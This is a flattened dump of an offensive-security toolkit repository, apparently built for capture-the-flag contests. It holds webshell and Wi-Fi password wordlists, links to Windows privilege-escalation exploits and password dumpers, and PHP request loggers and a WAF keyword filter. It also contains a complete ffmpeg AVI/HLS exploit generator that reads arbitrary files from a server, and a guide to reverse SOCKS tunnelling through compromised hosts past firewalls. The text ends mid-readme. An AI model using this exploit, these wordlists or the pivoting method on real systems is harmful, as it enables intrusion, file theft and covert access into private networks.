https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/DIR.txt -------------------------------------------------------------------------------- /dict/web/JSP.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/JSP.txt -------------------------------------------------------------------------------- /dict/web/MDB.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/MDB.txt -------------------------------------------------------------------------------- /dict/web/PHP.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/PHP.txt -------------------------------------------------------------------------------- /dict/webshell/shellpassword.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/webshell/shellpassword.txt -------------------------------------------------------------------------------- /dict/webshell/webshellPassword.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/webshell/webshellPassword.txt -------------------------------------------------------------------------------- /dict/webshell/webshell_password_no_name.txt: -------------------------------------------------------------------------------- 1 | 5201314 2 | 584521 3 | nohack 4 | 45189946 5 | baidu 6 | chenxue 7 | 913720787 8 | cnot 9 | xxoxx 10 | rinima 11 | hkk007 12 | po 13 | chengnuo 14 | 5556661221 15 | 123456 16 | wrsk 17 | 54321 18 | yuemo 19 | jcksyes 20 | 521 21 | ******* 22 | 4lert 23 | yuemo 24 | hacker 25 | xxxxx 26 | 10011C120105101 27 | fclshark 28 | 19880118 29 | 376186027 30 | admin 31 | 654321 32 | 535039 33 | admin 34 | 000 35 | darkst 36 | jcksyes 37 | 123456 38 | jcksyes 39 | jinjin 40 | 12345 41 | sq19880602 42 | jtk2352 43 | sq19880602 44 | kill 45 | chengnuo 46 | 45189946 47 | 123321 48 | admin 49 | hacker 50 | admin 51 | admin 52 | haode 53 | chuang 54 | 981246 55 | et520 56 | winner 57 | 20080808 58 | yrpx 59 | hkk007 60 | wrsk 61 | rinima 62 | ceshi2009 63 | 5201314 64 | rfkl 65 | 847381979 66 | jing 67 | winner 68 | 4816535 69 | zhack 70 | mama520 71 | 123go 72 | 1 73 | 888999 74 | 13572468 75 | sasa 76 | dangdang 77 | lovehack7758 78 | rfkl 79 | 123 80 | 133135136 81 | 1992724 82 | yong 83 | noid 84 | caodan 85 | 96315001 86 | admin 87 | axiao 88 | 847381979 89 | rfkl 90 | yuemo 91 | yuemo 92 | 12 93 | 535039 94 | bzxyd 95 | tonecan 96 | bzxyd 97 | 5201314 98 | 3est 99 | sin 100 | 654321 101 | ghost 102 | C 103 | c 104 | z 105 | Z 106 | 023 107 | 23 108 | cai 109 | sb 110 | yong 111 | webadmin 112 | login 113 | 5909062xzx 114 | hehe 115 | -------------------------------------------------------------------------------- /dict/webshell/webshll木马常用密码.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/webshell/webshll木马常用密码.txt -------------------------------------------------------------------------------- /dict/webshell/webshll木马常用密码1.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/webshell/webshll木马常用密码1.txt -------------------------------------------------------------------------------- /dict/webshell/收藏的后门密码.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/webshell/收藏的后门密码.txt -------------------------------------------------------------------------------- /dict/wifipass/wifi_password_top_100.txt: -------------------------------------------------------------------------------- 1 | 12345678 2 | 123456789 3 | 88888888 4 | 1234567890 5 | 00000000 6 | 87654321 7 | 66668888 8 | 147258369 9 | 11111111 10 | 987654321 11 | 11223344 12 | 123123123 13 | 66666666 14 | 0123456789 15 | 88889999 16 | 12341234 17 | 11112222 18 | a123456789 19 | 12344321 20 | 12345679 21 | a12345678 22 | 99999999 23 | a1234567 24 | 999999999 25 | abcd1234 26 | 1122334455 27 | 9876543210 28 | 23456789 29 | abc123456 30 | 123456789a 31 | qwertyuiop 32 | A1b2C3d4 33 | 88886666 34 | 123456780 35 | 12345687 36 | 12345678A 37 | 8888888888 38 | 012345678 39 | 22222222 40 | 1234554321 41 | 12345678910 42 | asdfghjkl 43 | 111222333 44 | 66778899 45 | 1234567899 46 | 77777777 47 | 00001111 48 | 12356789 49 | 123456788 50 | 888888888 51 | 0000000000 52 | 01234567 53 | 12345678900 54 | 55555555 55 | 321321321 56 | meiyoumima 57 | 98765432 58 | AA123456 59 | 789456123 60 | 1111111111 61 | 12121212 62 | 0987654321 63 | 12345677 64 | buzhidao 65 | 123456987 66 | 123321123 67 | 168168168 68 | 33333333 69 | 1234512345 70 | 1233211234567 71 | 01020304 72 | 111111111 73 | 123456789. 74 | 369369369 75 | abc12345 76 | 000000000 77 | 123654789 78 | 77778888 79 | qq123456 80 | 1357924680 81 | 789789789 82 | 123456123 83 | abc123456789 84 | 55558888 85 | aaaaaaaa 86 | ABC12345678 87 | 1234567890123 88 | 11118888 89 | 55556666 90 | 741852963 91 | 963852741 92 | 110110110 93 | 12345689 94 | 55667788 95 | asd123456 96 | 777888999 97 | 12346789 98 | 12345600 99 | 1234567891 100 | -------------------------------------------------------------------------------- /exp/win/GetPass.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/GetPass.zip -------------------------------------------------------------------------------- /exp/win/GetPassword_x64.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/GetPassword_x64.zip -------------------------------------------------------------------------------- /exp/win/ms16-032.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/ms16-032.exe -------------------------------------------------------------------------------- /exp/win/ms16-032_x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/ms16-032_x64.exe -------------------------------------------------------------------------------- /exp/win/pr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/pr.exe -------------------------------------------------------------------------------- /exp/win/pr_3389.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/exp/win/pr_3389.exe -------------------------------------------------------------------------------- /flowscript/flow.php: -------------------------------------------------------------------------------- 1 | flowdata = array(); 8 | $this->redirect = false; 9 | $this->logfiles = "/tmp/flow.log"; 10 | $this->Flow(); 11 | } 12 | 13 | public function Flow() 14 | { 15 | /* Method */ 16 | $this->flowdata['method'] = $_SERVER['REQUEST_METHOD']; 17 | /* Header */ 18 | $arr = array( 19 | 'HTTP_HOST', 20 | 'HTTP_REFERER', 21 | 'HTTP_USER_AGENT' 22 | ); 23 | foreach($arr as $key){ 24 | $this->flowdata['header'][ucwords(strtolower(str_replace("HTTP_", "", $key)))] = $_SERVER[$key]; 25 | } 26 | /* Url */ 27 | $this->flowdata['uri'] = $_SERVER['REQUEST_URI']; 28 | /* Protocol */ 29 | $this->flowdata['protocol'] = $_SERVER['SERVER_PROTOCOL']; 30 | /* IP */ 31 | $this->flowdata['ip'] = array( 32 | 'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'], 33 | 'CLIENT_IP'=>$_SERVER['HTTP_CLIENT_IP'], 34 | 'X_FORWARDED_FOR'=>$_SERVER['HTTP_X_FORWARDED_FOR'] 35 | ); 36 | /* Time */ 37 | $this->flowdata['time'] = date('Y-m-d H:i:s',$_SERVER['REQUEST_TIME']); 38 | /* CONTENT_TYPE */ 39 | $this->flowdata['ctype'] = $_SERVER['CONTENT_TYPE']; 40 | /* GetData ??? */ 41 | $this->flowdata['get'] = json_encode($_GET); 42 | /* PostData */ 43 | if(isset($_POST) or strtolower($this->flowdata['Method']) == 'post' ){ 44 | if($this->flowdata['ctype'] == 'application/x-www-form-urlencoded'){ 45 | $this->flowdata['post'] = json_encode($_POST); 46 | }else{ 47 | $this->flowdata['post'] = file_get_contents('php://input'); 48 | } 49 | } 50 | $this->Send("null"); 51 | } 52 | 53 | public function Send($keyword) 54 | { 55 | $data = $this->flowdata; 56 | file_put_contents($this->logfiles,"\r\n".$keyword."\r\n".print_r($data,true)."\r\n=====================================\r\n",FILE_APPEND); 57 | return 0; 58 | } 59 | } 60 | 61 | new PhpFlowLog(); -------------------------------------------------------------------------------- /flowscript/index.php: -------------------------------------------------------------------------------- 1 | filepath = $filepath; 8 | $this->header = array(); 9 | } 10 | 11 | public function Flow() 12 | { 13 | $arr = array('HTTP_HOST','HTTP_USER_AGENT','HTTP_ACCEPT','HTTP_ACCEPT_LANGUAGE','HTTP_ACCEPT_ENCODING','HTTP_REFERER','HTTP_COOKIE','HTTP_X_FORWARDED_FOR','HTTP_CONNECTION'); 14 | $HTTP_Method = $_SERVER['REQUEST_METHOD']; 15 | $server = $_SERVER; 16 | $Allfilepath = $this->filepath.'/'.date('Y-m-d-h').".log"; 17 | foreach($arr as $value){ 18 | $this->header[$value] = $server[$value]; 19 | } 20 | $head = ''; 21 | foreach ($this->header as $key => $value){ 22 | if(stripos($key, 'HTTP_') == -1){ 23 | $key = ucwords(strtolower($key)); 24 | }else{ 25 | $key = ucwords(strtolower(substr($key, 5))); 26 | } 27 | $head.= $key.': '.$value."\r\n"; 28 | } 29 | $request_url = $_SERVER['REQUEST_URI']; 30 | $protocol = $_SERVER['SERVER_PROTOCOL']; 31 | $post = file_get_contents('php://input'); 32 | $ip = $_SERVER['REMOTE_ADDR']; 33 | $time = date('Y/m/d h:i:s'); 34 | $content = $ip."\t".$time."\t\n".$HTTP_Method.' '.$request_url.' '.$protocol."\r\n".$head."\n\n".$post."\n\n"; 35 | $this->WriteFile($Allfilepath,$content,FILE_APPEND); 36 | } 37 | 38 | public function WriteFile($filepath,$content,$FILE_APPEND=FILE_APPEND) 39 | { 40 | file_put_contents($filepath,$content,$FILE_APPEND); 41 | } 42 | } 43 | 44 | $Catchs = new WafLog('/tmp/'); 45 | $Catchs->Flow(); 46 | ?> -------------------------------------------------------------------------------- /flowscript/waf.php: -------------------------------------------------------------------------------- 1 | checkips = array('127.0.0.1'); 11 | $this->flowdata = array(); 12 | // Redirect 13 | $this->redirect = false; 14 | // files 15 | $this->logfiles = $_SERVER['DOCUMENT_ROOT'].'/logfiles/'; 16 | if(!file_exists($this->logfiles)){ 17 | mkdir($this->logfiles,0777,true); 18 | } 19 | // Run 20 | $this->Flow(); 21 | } 22 | 23 | public function Flow() 24 | { 25 | /* Method */ 26 | $this->flowdata['method'] = $_SERVER['REQUEST_METHOD']; 27 | /* Header */ 28 | $arr = array( 29 | 'HTTP_HOST', 30 | 'HTTP_REFERER', 31 | 'HTTP_USER_AGENT' 32 | // wtf 33 | // 'HTTP_ACCEPT', 34 | // 'HTTP_ACCEPT_LANGUAGE', 35 | // 'HTTP_ACCEPT_ENCODING', 36 | // 'HTTP_CONNECTION' 37 | ); 38 | foreach($arr as $key){ 39 | $this->flowdata['header'][ucwords(strtolower(str_replace("HTTP_", "", $key)))] = $_SERVER[$key]; 40 | } 41 | /* Url */ 42 | $this->flowdata['uri'] = $_SERVER['REQUEST_URI']; 43 | /* Protocol */ 44 | $this->flowdata['protocol'] = $_SERVER['SERVER_PROTOCOL']; 45 | /* IP */ 46 | $this->flowdata['ip'] = array( 47 | 'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'], 48 | 'CLIENT_IP'=>$_SERVER['HTTP_CLIENT_IP'], 49 | 'X_FORWARDED_FOR'=>$_SERVER['HTTP_X_FORWARDED_FOR'] 50 | ); 51 | /* Time */ 52 | $this->flowdata['time'] = date('Y-m-d H:i:s',$_SERVER['REQUEST_TIME']); 53 | /* CONTENT_TYPE */ 54 | $this->flowdata['ctype'] = $_SERVER['CONTENT_TYPE']; 55 | /* GetData ??? */ 56 | /* PostData */ 57 | if(isset($_POST) or strtolower($this->flowdata['Method']) == 'post' ){ 58 | if($this->flowdata['ctype'] == 'application/x-www-form-urlencoded'){ 59 | $this->flowdata['post'] = json_encode($_POST); 60 | }else{ 61 | $this->flowdata['post'] = file_get_contents('php://input'); 62 | } 63 | } 64 | /* File */ 65 | if(isset($_FILES)){ 66 | foreach ($_FILES as $key => $fileobj){ 67 | $bn = $this->logfiles.md5(time()).'_'.basename($fileobj['file_name']); 68 | $this->this->flowdata['filedata'][$key]['name'] = $bn; 69 | $filedata = file_get_contents($fileobj['tmp_name']); 70 | if($fileobj['file_size'] < 1024 ){ 71 | $this->this->flowdata['filedata'][$key]['data'] = $filedata; 72 | }else{ 73 | file_put_contents($bn, $filedata); 74 | $this->Scan($filedata); 75 | } 76 | } 77 | } 78 | // test 79 | // $this->Send("test"); 80 | foreach ($this->flowdata as $key => $value) { 81 | $this->Scan($value); 82 | } 83 | // => fuck Location 最好的那个队伍 84 | if($this->redirect){ 85 | header("Location: http://".$this->redirect.$_SERVER['REQUEST_URI']); 86 | exit('this is waf.....'); 87 | } 88 | } 89 | 90 | public function Scan($input){ 91 | $pattern = "select|insert|update|delete|and|union|load_file|outfile|dumpfile|sub|hex|flag"; // sql inject 92 | $pattern .= "|file_put_contents|fwrite|eval|assert|file:\/\/"; 93 | $pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore"; 94 | $pattern .="|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|pcntl_exec"; 95 | if (preg_match_all( "/$pattern/i", $input, $matches)){ 96 | // $this->Send(print_r($matches,true)); 97 | $this->Send(json_encode($matches[0])); 98 | // WAF 99 | die(json_encode($matches[0])); 100 | 101 | // foreach ($this->checkips as $key => $value) { 102 | // if(strpos(json_encode($this->flowdata['ip']), $value) === false){ 103 | // header("Location: /index.php"); 104 | // } 105 | // } 106 | } 107 | } 108 | 109 | public function Send($keyword) 110 | { 111 | // header('Content-Type: application/json'); 112 | // echo json_encode($this->flowdata); 113 | $data = $this->flowdata; 114 | file_put_contents("/tmp/".date("d-h").".log", $keyword."\r\n".print_r($data,true)."\r\n=====================================\r\n",FILE_APPEND); 115 | return 0; 116 | } 117 | 118 | } 119 | 120 | new PhpFlowLog('test'); 121 | 122 | ?> 123 | -------------------------------------------------------------------------------- /gen_xbin_avi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import struct 3 | import argparse 4 | import random 5 | import string 6 | 7 | AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST movi" 8 | 9 | ECHO_TEMPLATE = """### echoing {needed!r} 10 | #EXT-X-KEY: METHOD=AES-128, URI=/dev/zero, IV=0x{iv} 11 | #EXTINF:1, 12 | #EXT-X-BYTERANGE: 16 13 | /dev/zero 14 | #EXT-X-KEY: METHOD=NONE 15 | """ 16 | 17 | # AES.new('\x00'*16).decrypt('\x00'*16) 18 | GAMMA = b'\x14\x0f\x0f\x10\x11\xb5"=yXw\x17\xff\xd9\xec:' 19 | 20 | FULL_PLAYLIST = """#EXTM3U 21 | #EXT-X-MEDIA-SEQUENCE:0 22 | {content} 23 | #### random string to prevent caching: {rand} 24 | #EXT-X-ENDLIST""" 25 | 26 | EXTERNAL_REFERENCE_PLAYLIST = """ 27 | 28 | #### External reference: reading {size} bytes from {filename} (offset {offset}) 29 | #EXTINF:1, 30 | #EXT-X-BYTERANGE: {size}@{offset} 31 | {filename} 32 | 33 | 34 | """ 35 | 36 | XBIN_HEADER = b'XBIN\x1A\x20\x00\x0f\x00\x10\x04\x01\x00\x00\x00\x00' 37 | 38 | 39 | def echo_block(block): 40 | assert len(block) == 16 41 | iv = ''.join(map('{:02x}'.format, [x ^ y for (x, y) in zip(block, GAMMA)])) 42 | return ECHO_TEMPLATE.format(needed=block, iv=iv) 43 | 44 | 45 | def gen_xbin_sync(): 46 | seq = [] 47 | for i in range(60): 48 | if i % 2: 49 | seq.append(0) 50 | else: 51 | seq.append(128 + 64 - i - 1) 52 | for i in range(4, 0, -1): 53 | seq.append(128 + i - 1) 54 | seq.append(0) 55 | seq.append(0) 56 | for i in range(12, 0, -1): 57 | seq.append(128 + i - 1) 58 | seq.append(0) 59 | seq.append(0) 60 | return seq 61 | 62 | 63 | def test_xbin_sync(seq): 64 | for start_ind in range(64): 65 | path = [start_ind] 66 | cur_ind = start_ind 67 | while cur_ind < len(seq): 68 | if seq[cur_ind] == 0: 69 | cur_ind += 3 70 | else: 71 | assert seq[cur_ind] & (64 + 128) == 128 72 | cur_ind += (seq[cur_ind] & 63) + 3 73 | path.append(cur_ind) 74 | assert cur_ind == len(seq), "problem for path {}".format(path) 75 | 76 | 77 | def echo_seq(s): 78 | assert len(s) % 16 == 0 79 | res = [] 80 | for i in range(0, len(s), 16): 81 | res.append(echo_block(s[i:i + 16])) 82 | return ''.join(res) 83 | 84 | 85 | test_xbin_sync(gen_xbin_sync()) 86 | 87 | SYNC = echo_seq(gen_xbin_sync()) 88 | 89 | 90 | def make_playlist_avi(playlist, fake_packets=1000, fake_packet_len=3): 91 | content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + playlist.encode('ascii') 92 | packet = b'00tx' + struct.pack(' 0: 105 | packet_size -= 16 106 | assert packet_size > 0 107 | part_size = min(packet_size, 64) 108 | packet_size -= part_size 109 | result.append(echo_block(gen_xbin_packet_header(part_size))) 110 | result.append( 111 | EXTERNAL_REFERENCE_PLAYLIST.format( 112 | size=part_size, 113 | offset=offset, 114 | filename=filename)) 115 | offset += part_size 116 | return ''.join(result), offset 117 | 118 | 119 | def gen_xbin_playlist(filename_to_read): 120 | pls = [echo_block(XBIN_HEADER)] 121 | next_delta = 5 122 | for max_offs, filename in ( 123 | (5000, filename_to_read), (500, "file:///dev/zero")): 124 | offset = 0 125 | while offset < max_offs: 126 | for _ in range(10): 127 | pls_part, new_offset = gen_xbin_packet_playlist( 128 | filename, offset, 0xf0 - next_delta) 129 | pls.append(pls_part) 130 | next_delta = 0 131 | offset = new_offset 132 | pls.append(SYNC) 133 | return FULL_PLAYLIST.format(content=''.join(pls), rand=''.join( 134 | random.choice(string.ascii_lowercase) for i in range(30))) 135 | 136 | 137 | if __name__ == "__main__": 138 | parser = argparse.ArgumentParser('AVI+M3U+XBIN ffmpeg exploit generator') 139 | parser.add_argument( 140 | 'filename', 141 | help='filename to be read from the server (prefix it with "file://")') 142 | parser.add_argument('output_avi', help='where to save the avi') 143 | args = parser.parse_args() 144 | assert '://' in args.filename, "ffmpeg needs explicit proto (forgot file://?)" 145 | content = gen_xbin_playlist(args.filename) 146 | avi = make_playlist_avi(content) 147 | output_name = args.output_avi 148 | 149 | with open(output_name, 'wb') as f: 150 | f.write(avi) -------------------------------------------------------------------------------- /misc/Stegsolve.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/misc/Stegsolve.jar -------------------------------------------------------------------------------- /misc/ZipCenOp.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/misc/ZipCenOp.jar -------------------------------------------------------------------------------- /other/py-server-cmd.txt: -------------------------------------------------------------------------------- 1 | Http 2 | python -m SimpleHTTPServer 80 3 | 4 | Ftp 5 | python -m pyftpdlib -p 21 -------------------------------------------------------------------------------- /other/test.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | # 3 | import requests 4 | import urllib 5 | import hashlib 6 | import bs4 7 | 8 | req = requests.get("http://106.75.67.214:2250") 9 | _cookies = req.cookies 10 | text = req.headers['Ciphertext'] 11 | print text 12 | 13 | content = req.content 14 | bsobj = bs4.BeautifulSoup(content, "html.parser") 15 | part = bsobj.findAll(text=lambda text: isinstance(text, bs4.Comment))[ 16 | 2].split("+")[1].split(")")[0] 17 | print part 18 | 19 | for i in range(100, 999): 20 | dest = str(i)+part 21 | if hashlib.sha1(dest).hexdigest() == text: 22 | data = {"pass": i} 23 | req = requests.post( 24 | "http://106.75.67.214:2250", data=data, cookies=_cookies) 25 | print req.content 26 | 27 | bsobj = bs4.BeautifulSoup(req.content, "html.parser") 28 | print bsobj.findAll(text=lambda text: isinstance(text, bs4.Comment))[2] 29 | part = bsobj.findAll(text=lambda text: isinstance(text, bs4.Comment))[ 30 | 2].split(u"\uff1a")[1] 31 | 32 | result = eval(part) 33 | 34 | data = {"pass": result} 35 | req = requests.post( 36 | "http://106.75.67.214:2250", data=data, cookies=_cookies) 37 | print req.content # flag{f325c62b-9505-4c13-ad4b-010bddb23c68} 38 | 39 | break 40 | 41 | else: 42 | continue 43 | -------------------------------------------------------------------------------- /proxy/Earthworm/Readme.txt: -------------------------------------------------------------------------------- 1 | 【软件介绍】 2 | 3 | EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。 4 | 专有主页: http://rootkiter.com/EarthWorm/ 5 | 6 | 【使用场景】 7 | 8 | 普通网络环境: 9 | 1. 目标网络边界存在公网IP且可任意开监听端口: 10 | 11 | +---------+ +-------------------+ 12 | |HackTools| ->> | 8888-> 1.1.1.1 | 13 | +---------+ +-------------------+ 14 | 15 | a)./ew -s ssocksd -l 8888 16 | // 在 1.1.1.1 主机上通过这个命令开启 8888 端口的 socks 代理 17 | b) HackTools 可通过访问 1.1.1.1:8888 端口使用 1.1.1.1 主机提供的代理 18 | 19 | 2. 目标网络边界不存在公网 IP,需要通过反弹方式创建 socks 代理 20 | 21 | 一台可控公网IP主机 可控内网主机 22 | +---------+ +--------------------------+ | +---------------+ 23 | |HackTools| ->> | 1080 -> 1.1.1.1 -> 8888 | 防火墙 | <-- 2.2.2.2 | 24 | +---------+ +--------------------------+ | +---------------+ 25 | 26 | a) ./ew -s rcsocks -l 1080 -e 8888 27 | // 在 1.1.1.1 的公网主机添加转接隧道,将 1080 收到的代理请求转交给反连 8888 端口的主机 28 | b) ./ew -s rssocks -d 1.1.1.1 -e 8888 29 | // 将目标网络的可控边界主机反向连接公网主机 30 | 31 | c) HackTools 可通过访问 1.1.1.1:1080 端口使用 rssocks 主机提供的 socks5 代理服务 32 | 33 | 对于二重网络环境: 34 | 1. 获得目标网络内两台主机 A、B 的权限,情况描述如下: 35 | 36 | A 主机: 存在公网 IP,且自由监听任意端口,无法访问特定资源 37 | B 主机: 目标网络内部主机,可访问特定资源,但无法访问公网 38 | A 主机可直连 B 主机 39 | 40 | 可控边界主机A 可访问指定资源的主机B 41 | +---------+ +-----------------------+ +-----------------+ 42 | |HackTools| ->> | 1080 --> 2.2.2.2 --> | ->> | 9999 -> 2.2.2.3 | 43 | +---------+ +-----------------------+ +-----------------+ 44 | 45 | a) ./ew -s ssocksd -l 9999 46 | // 在 2.2.2.3 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理 47 | b) ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 48 | // 将 1080 端口收到的 socks 代理请求转交给 2.2.2.3 的主机。 49 | c) HackTools 可通过访问 2.2.2.2:1080 来使用 2.2.2.3 主机提供的 socks5 代理。 50 | 51 | 2. 获得目标网络内两台主机 A、B 的权限,情况描述如下: 52 | 53 | A 主机: 目标网络的边界主机,无公网 IP,无法访问特定资源。 54 | B 主机: 目标网络内部主机,可访问特定资源,却无法回连公网。 55 | 56 | A 主机可直连 B 主机 57 | 一台可控公网IP主机 可控内网主机A 可访问指定资源的主机B 58 | +---------+ +--------------------------+ | +-----------------+ +-----------------+ 59 | |HackTools| ->> | 1080 -> 1.1.1.1 -> 8888 | 防火墙 | <-- 2.2.2.2 --> | ->> | 9999 -> 2.2.2.3 | 60 | +---------+ +--------------------------+ | +-----------------+ +-----------------+ 61 | 62 | a) ./ew -s lcx_listen -l 1080 -e 8888 63 | // 在 1.1.1.1 公网主机添加转接隧道,将 1080 收到的代理请求 64 | // 转交给反连 8888 端口的主机 65 | b) ./ew -s ssocksd -l 9999 66 | // 在 2.2.2.3 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理 67 | c) ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999 68 | // 在 2.2.2.2 上,通过工具的 lcx_slave 方式,打通1.1.1.1:8888 和 2.2.2.3:9999 之间的通讯隧道 69 | d) HackTools 可通过访问 1.1.1.1:1080 来使用 2.2.2.3 主机提供的 socks5 代理 70 | 71 | 72 | 【参数说明】 73 | 74 | 目前工具提供六种链路状态,可通过 -s 参数进行选定,分别为: 75 | 76 | ssocksd rcsocks rssocks 77 | lcx_slave lcx_tran lcx_listen 78 | 79 | 其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理。 80 | 81 | 其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。 82 | 83 | lcx 类别管道: 84 | 85 | lcx_slave 该管道一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机。 86 | lcx_tran 该管道,通过监听本地端口接收代理请求,并转交给代理提供主机。 87 | lcx_listen 该管道,通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机。 88 | 89 | 通过组合lcx类别管道的特性,可以实现多层内网环境下的渗透测试。 90 | 91 | 下面是一个三级跳的本地测试例子。。。 92 | ./ew -s rcsocks -l 1080 -e 8888 93 | ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 94 | I:\www\ew.exe -s lcx_slave -f 127.0.0.1 -g 3389 -d 172.17.137.9 -e 9999 95 | ./ew -s lcx_listen -l 9999 -e 7777 96 | ./ew -s rssocks -d 127.0.0.1 -e 7777 97 | 98 | 数据流向为 IE -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks 99 | 100 | 【补充说明】 101 | 1.为了减少网络资源的消耗,程序中添加了超时机制,默认时间为10000毫秒(10秒), 102 | 用户可以通过追加 -t 参数来调整这个值,单位为毫秒。在多级级联功能中,超时机制 103 | 将以隧道中最短的时间为默认值。 104 | 2.单纯从设计原理上讲,多级级联的三种状态可以转发任意以TCP为基础的通讯服务, 105 | 包括远程桌面/web服务 等。 106 | 3.产品包中的 ew_for_Arm32 在开发者已有平台下(android手机、小米路由器、树莓派) 测试无误。 107 | 如果有其它异常环境请将对应详细细节反馈给作者,以便更新程序问题。 108 | 109 | 【联系作者】 110 | 111 | rootkiter@rootkiter.com 112 | 如果您在使用中有什么好想法,或遇到什么BUG,都可以主动联系我。 113 | 我会尽最大所能让这个工具更加完美,感谢大家的支持。 114 | -------------------------------------------------------------------------------- /proxy/Earthworm/ew_for_Arm32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_for_Arm32 -------------------------------------------------------------------------------- /proxy/Earthworm/ew_for_Linux32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_for_Linux32 -------------------------------------------------------------------------------- /proxy/Earthworm/ew_for_MacOSX64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_for_MacOSX64 -------------------------------------------------------------------------------- /proxy/Earthworm/ew_for_Win.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_for_Win.exe -------------------------------------------------------------------------------- /proxy/Earthworm/ew_for_linux64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_for_linux64 -------------------------------------------------------------------------------- /proxy/Earthworm/ew_mipsel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_mipsel -------------------------------------------------------------------------------- /proxy/Termite/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | name : Termite 用法 3 | --- 4 | 5 | # Usage 6 | 7 | 1. 